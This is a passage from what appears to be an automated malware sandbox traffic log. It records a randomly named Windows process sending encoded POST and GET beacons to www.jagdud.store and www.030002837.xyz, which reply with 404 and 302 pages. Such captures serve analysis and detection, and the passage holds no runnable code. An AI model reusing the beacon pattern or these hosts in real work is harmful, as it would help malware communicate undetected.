yLtQfT1eS7ya4ku+1qWyioK [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:03.613315105 CEST228OUTData Raw: 35 68 75 37 54 6b 43 36 51 4b 6f 78 6f 46 77 45 52 39 38 54 41 42 52 47 5a 4f 39 6c 62 67 62 64 34 61 72 46 4e 57 72 43 43 69 6c 6b 72 76 6a 72 67 48 52 2f 53 46 4b 2f 34 36 79 6d 73 69 4d 45 52 48 36 6e 4d 6f 55 68 58 4c 6f 2f 39 70 53 72 59 54
                                                                                        Data Ascii: 5hu7TkC6QKoxoFwER98TABRGZO9lbgbd4arFNWrCCilkrvjrgHR/SFK/46ymsiMERH6nMoUhXLo/9pSrYTx0sjnV8HncFOTcYxQBDxOIyFZO+pB1Im1VRiHZWBnNI6E2JIzWFxLRC9LuPv2shEGwjRmyXWsMOFJ8xT6Hi6NmC557OhE/IN1H0jO8wCvYTYfu6eVEIiaA3oUioBoxMwrtNhJmSdq0jOwGuiRk
                                                                                        Oct 9, 2024 12:54:04.212234974 CEST533INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 09 Oct 2024 10:54:04 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.2249198209.74.64.187801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:06.173465014 CEST739OUTPOST /qxse/ HTTP/1.1
                                                                                        Host: www.jagdud.store
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.jagdud.store
                                                                                        Referer: http://www.jagdud.store/qxse/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6e 4d 6f 50 53 42 4e 6e 4a 49 50 37 59 51 69 31 41 4a 38 55 34 4c 71 71 79 43 32 75 63 4e 66 59 53 6c 73 63 44 4a 64 73 72 73 63 61 4d 44 6b 6b 33 4c 46 42 69 39 66 7a 56 35 37 4e 73 53 2b 66 48 39 43 68 53 6c 74 54 65 76 47 45 6a 4d 57 76 4c 74 4f 39 38 57 64 57 68 69 66 33 75 77 78 48 75 47 6d 63 6e 51 52 7a 4b 4a 6a 6f 77 7a 53 43 30 69 76 31 30 79 36 56 71 4c 76 79 68 66 56 50 75 69 57 47 69 72 32 64 53 76 2f 31 35 4b 67 33 67 78 47 43 51 6e 31 56 55 6e 58 43 45 6f 73 32 6f 62 51 7a 78 5a 6e 34 67 2f 49 69 7a 66 53 6e 62 53 67 4c 72 41 3d 3d
                                                                                        Data Ascii: jnQX=mrFM9RmSUx+2nMoPSBNnJIP7YQi1AJ8U4LqqyC2ucNfYSlscDJdsrscaMDkk3LFBi9fzV57NsS+fH9ChSltTevGEjMWvLtO98WdWhif3uwxHuGmcnQRzKJjowzSC0iv10y6VqLvyhfVPuiWGir2dSv/15Kg3gxGCQn1VUnXCEos2obQzxZn4g/IizfSnbSgLrA==
                                                                                        Oct 9, 2024 12:54:06.864512920 CEST533INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 09 Oct 2024 10:54:06 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.2.2249199209.74.64.187801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:08.717849970 CEST2472OUTPOST /qxse/ HTTP/1.1
                                                                                        Host: www.jagdud.store
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.jagdud.store
                                                                                        Referer: http://www.jagdud.store/qxse/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6d 73 59 50 65 43 6c 6e 63 34 4f 4a 47 67 69 31 4a 70 38 51 34 4c 32 71 79 41 61 2b 66 2f 7a 59 56 32 55 63 44 73 70 73 6e 4d 63 61 64 54 6b 6f 39 72 45 41 69 39 61 41 56 37 7a 43 73 52 53 66 48 61 75 68 62 48 31 53 4b 76 47 43 31 38 57 77 4c 74 4f 6b 38 57 4e 53 68 69 4b 53 75 78 5a 48 75 30 2b 63 68 67 52 38 54 70 6a 6f 77 7a 53 47 30 69 75 73 30 79 79 7a 71 4f 44 69 68 74 64 50 76 48 71 47 6a 49 65 53 55 76 2f 78 7a 71 68 72 72 6b 75 4a 53 6e 64 54 66 46 62 63 62 62 59 58 6f 61 45 4a 34 61 4b 7a 71 66 73 59 37 61 36 31 52 57 39 37 6f 6a 49 58 2b 6d 49 50 63 38 70 78 6a 77 6f 69 77 77 32 49 52 43 56 56 44 51 62 4b 6a 55 71 32 67 39 2b 66 77 53 6c 36 49 56 79 70 42 38 64 34 71 64 2b 34 77 74 4d 62 69 51 4e 46 57 6e 64 69 57 36 42 4b 6e 45 32 66 6e 6d 56 74 66 2b 5a 4f 79 63 44 70 41 33 53 73 47 54 62 4b 58 33 74 56 64 73 43 57 6a 69 4d 79 67 44 37 63 63 6e 55 55 79 70 4c 44 50 54 38 79 66 41 4f 31 32 4a 45 47 6b 33 33 6f 42 69 6e 6d 7a 55 50 51 48 [TRUNCATED]
                                                                                        Data Ascii: jnQX=mrFM9RmSUx+2msYPeClnc4OJGgi1Jp8Q4L2qyAa+f/zYV2UcDspsnMcadTko9rEAi9aAV7zCsRSfHauhbH1SKvGC18WwLtOk8WNShiKSuxZHu0+chgR8TpjowzSG0ius0yyzqODihtdPvHqGjIeSUv/xzqhrrkuJSndTfFbcbbYXoaEJ4aKzqfsY7a61RW97ojIX+mIPc8pxjwoiww2IRCVVDQbKjUq2g9+fwSl6IVypB8d4qd+4wtMbiQNFWndiW6BKnE2fnmVtf+ZOycDpA3SsGTbKX3tVdsCWjiMygD7ccnUUypLDPT8yfAO12JEGk33oBinmzUPQHcPmXFCs9VDMQFDsDzA7jc6ad2S1MNAIFYEsREwjDe6XhEeM608pz2nQNcU0XowvviX1pxejU/m18JctmNEyfrhGi+WJE3XhFB7B19ea5kzClISYEJ1mk4YUxnEBWrwiZnhoYZVAViSmqTfiw1GHyLmMkSUcKwS1dao4X2eHNzACBSXk8IgFGR5QwS0A+saIDu48fgd0xTkMgFiC7/2Nb9TpMFBKen1aPSCjnap6c6k7hH0dzzs3wH7LbB2Yg8BPiIF2QvFbwXyVoJbB6Su79s7ZBks4ilnaqHPBwotRDQISqaakw4l/fZA2QLh3pFn2OYKoPNq0b8sM9cyWgovVVYOAeA1zi7dj0ghwBKCyXTN3CywjfrEmHv/zQZsgGtEQ9jeWQa5FcNq8MniTiy2wC8Wkl7/sQFAMVYMhYd0JZ8I6YvzrmnmAWX/wL8bLYcXnIoeQ5IueWCWP/q0iQOsHOoioEMH3c+SeLtAcRSpqNejCPY5xdmI7ogNcTBsUEcVUJvb4dk4k4nVGIUcnHwIvyu60+384f0lj86msgmPDvM9O+cyGvpJdcl0r8QYkSRRFhPwaiVXZxnfaRyY2MBtNSjoF+d8f2Uhv0GjDleeVB3UzC6uldj3UMqamjaiqZyGHCYcgARBDhet69rtSfT5bS77W4kmE1t6ysoK [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:08.722747087 CEST1692OUTData Raw: 35 68 65 37 54 6d 61 36 51 61 6f 79 77 6c 77 46 4c 4e 38 55 5a 52 51 66 5a 4f 39 70 62 6b 44 6a 34 5a 48 46 4d 45 6a 43 46 54 6c 6b 72 66 6a 74 71 6e 52 73 57 46 33 34 34 36 32 69 73 6a 38 2b 52 31 69 6e 4d 61 63 68 42 4a 77 2f 34 4a 53 75 56 7a
                                                                                        Data Ascii: 5he7Tma6QaoywlwFLN8UZRQfZO9pbkDj4ZHFMEjCFTlkrfjtqnRsWF34462isj8+R1inMachBJw/4JSuVzxysjrx8D6zFMqzYAcBDBOI/j1J05B3Pm1iRiHxWB/3I7YmJJ7WFyzRANLtfv22mEGljRqIXW1tOF58xSWHiadmSp57CBE6LN1O5DCjwCmGFeDzxOpMFg65uKUkpyA4KDvwNRRgXMOQ4accu34XIuni47+Fy7ou6dv
                                                                                        Oct 9, 2024 12:54:09.367147923 CEST533INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 09 Oct 2024 10:54:09 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.2249200209.74.64.187801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:11.484874964 CEST474OUTGET /qxse/?jnQX=rpts+huSPQ+pmLEfVBJQXPKHPF6QGptJ0LqkryefQtnAbXwhGMtosN0vN05C67pBp4rQA57+jRSPBKniSAxaDdWt3qORG9yS0W8xsQ/JiARutE+hlRtDJ7/I/ECM&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.jagdud.store
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:54:11.866625071 CEST548INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 09 Oct 2024 10:54:11 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.224920165.21.196.90801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:16.992212057 CEST2472OUTPOST /y045/ HTTP/1.1
                                                                                        Host: www.030002837.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.030002837.xyz
                                                                                        Referer: http://www.030002837.xyz/y045/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 49 6a 6d 59 65 37 33 4c 4f 69 65 59 39 6a 48 35 58 45 30 77 6d 76 78 67 4d 65 39 56 6c 53 38 67 37 70 5a 75 44 31 76 58 43 6e 45 42 48 66 72 4e 30 5a 41 69 42 73 48 32 32 6d 62 33 2f 47 62 41 49 72 63 63 62 33 70 4e 56 30 32 4d 71 68 35 65 6b 45 73 36 44 2f 5a 74 66 73 2f 43 67 33 5a 72 68 6a 57 36 31 75 4e 7a 72 78 39 69 4d 79 4f 71 38 61 58 64 33 57 52 2b 6a 50 44 2f 6c 44 37 2f 64 47 63 6c 4b 53 5a 45 6b 69 61 58 73 33 32 55 34 53 63 54 70 2f 42 2f 39 68 30 6a 4c 61 48 76 78 4f 4e 41 77 4c 76 67 6e 75 55 63 32 38 63 37 4d 46 6b 36 4a 63 47 4a 58 4a 65 36 44 6e 63 53 2f 44 42 41 47 61 5a 34 61 73 58 44 2f 34 43 4a 66 51 76 6b 36 2b 50 50 4d 66 67 65 74 6c 73 53 53 59 4e 6c 50 53 67 48 6d 6a 47 49 69 6f 4d 56 43 49 45 2f 49 58 34 48 37 74 62 46 71 66 31 50 51 6f 68 71 4d 69 61 4d 79 6d 63 46 4b 37 70 49 4e 48 69 41 75 59 4b 73 79 7a 77 4c 4c 32 38 42 35 35 6c 6e 35 6d 76 54 34 6d 69 59 6a 70 4d 44 67 38 71 30 4e 34 57 32 4f 50 4d 6d 2b 77 76 65 34 [TRUNCATED]
                                                                                        Data Ascii: jnQX=/3pi4VdoD972IjmYe73LOieY9jH5XE0wmvxgMe9VlS8g7pZuD1vXCnEBHfrN0ZAiBsH22mb3/GbAIrccb3pNV02Mqh5ekEs6D/Ztfs/Cg3ZrhjW61uNzrx9iMyOq8aXd3WR+jPD/lD7/dGclKSZEkiaXs32U4ScTp/B/9h0jLaHvxONAwLvgnuUc28c7MFk6JcGJXJe6DncS/DBAGaZ4asXD/4CJfQvk6+PPMfgetlsSSYNlPSgHmjGIioMVCIE/IX4H7tbFqf1PQohqMiaMymcFK7pINHiAuYKsyzwLL28B55ln5mvT4miYjpMDg8q0N4W2OPMm+wve4hmzocJI2RD+VqsdE+hYJDBum+3x3zKvKF4Q4UUN2RJ9aJkzNJyYsAqzJ55V10UFCnqVwBDOtLpuk7C/FpcwPTcQ3On1ORH+5vK1M0J7cOlDhzeAyUDRyy9b9D9rXXnIFrjZovD6q0XsU6beqwCOURvPi3oyu2Sc7nQ9hERdWU097wWg608anXP7KLdIkgINcyEkzC/EgUNm/Pt1pYQFY+HZRnA12c/yaMafhmrLw4qZVROmhjfFQIR04A3K8DKg3sr/ud852Ra9LloYyshW9YHBkfz9r+CNnOw4GrrkhJxPPI9NoNgAfS3l2avWtuW4XCiySvJlr0QJhaW2glm/42Z/RS1T6kkXzQ42octx/IQ5HFzrqXEHV7Cpto8C8H/xD1vZVj40nY4K1HBUidDBQl+x70GARImuOnR9rAi0ms91JUJuqemeIYYlrRMW3m2rJA4zRA2vlhkfxep/GCU6RSYKqxXJo5irb0iAMpkBcBDwGsV0aChfw8p+Km9wzT0OK25aCTJkCcR4a0qQQb4E0BNh2xwt+/a9BJtKFxmGzsfAydtunbkSuv3wpAawUj3D2Ll1cFSVqkd3MvyntoU8dVoFbC/QmEBz9t8z10WwKFa8Ug6wfTuqh8EgvS6o4mlXA1RG5Aqn+zjM6CHrawRgB5HqKmvFHCbcrRu [TRUNCATED]
                                                                                        Oct 9, 2024 12:54:16.997250080 CEST231OUTData Raw: 36 66 32 7a 41 46 53 51 49 51 2f 6c 74 67 57 44 5a 53 4b 74 2f 69 71 50 43 39 39 47 62 41 56 33 79 66 66 46 4e 43 70 31 35 52 6c 70 6e 4b 6a 75 45 4f 51 32 74 4a 76 5a 57 72 37 47 33 36 43 67 76 47 4a 63 34 5a 36 41 6f 34 5a 5a 59 4f 2f 33 63 2f
                                                                                        Data Ascii: 6f2zAFSQIQ/ltgWDZSKt/iqPC99GbAV3yffFNCp15RlpnKjuEOQ2tJvZWr7G36CgvGJc4Z6Ao4ZZYO/3c/QiOrWzM9hGKLQm6DodzeReybs0PzbUgT03aoLh1a8D7nfuUNq4zMrSy+fE5ZGmewthWFAVEFVazNAzbpw81Vj8tzDdW/zem3pGTju1D+OWrg/omIybcpBqDsaS/D8uzAjQrEJPNyKEBBaqNMh0K/G
                                                                                        Oct 9, 2024 12:54:17.648829937 CEST1038INHTTP/1.1 302 Found
                                                                                        Connection: close
                                                                                        content-type: text/html
                                                                                        content-length: 771
                                                                                        date: Wed, 09 Oct 2024 10:54:17 GMT
                                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                        location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                        vary: User-Agent
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        39192.168.2.224920265.21.196.90801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:54:19.544423103 CEST742OUTPOST /y045/ HTTP/1.1
                                                                                        Host: www.030002837.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.030002837.xyz
                                                                                        Referer: http://www.030002837.xyz/y045/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 49 67 2b 59 66 70 50 4c 63 53 65 59 78 44 48 35 41 55 30 32 6d 76 38 44 4d 66 49 4b 6c 6b 59 67 37 34 70 75 44 47 48 58 52 58 45 43 53 76 72 4a 36 35 41 4e 42 73 47 58 32 6b 66 33 2f 48 2f 41 4a 4a 6b 63 64 31 52 4d 64 6b 32 30 6d 42 35 66 6b 45 6f 5a 44 2f 63 71 66 74 62 43 67 31 64 72 67 6a 47 36 77 4d 6c 7a 6e 68 39 6b 4f 79 50 79 38 61 71 5a 33 57 42 32 6a 50 2f 2f 6c 32 48 2f 64 58 38 6c 64 78 68 45 75 43 61 55 69 58 33 43 33 54 31 4d 33 70 64 77 33 78 45 7a 42 62 4c 4b 38 65 6c 42 2f 34 58 53 67 76 59 4f 78 59 4d 6c 4f 56 4a 44 58 67 3d 3d
                                                                                        Data Ascii: jnQX=/3pi4VdoD972Ig+YfpPLcSeYxDH5AU02mv8DMfIKlkYg74puDGHXRXECSvrJ65ANBsGX2kf3/H/AJJkcd1RMdk20mB5fkEoZD/cqftbCg1drgjG6wMlznh9kOyPy8aqZ3WB2jP//l2H/dX8ldxhEuCaUiX3C3T1M3pdw3xEzBbLK8elB/4XSgvYOxYMlOVJDXg==
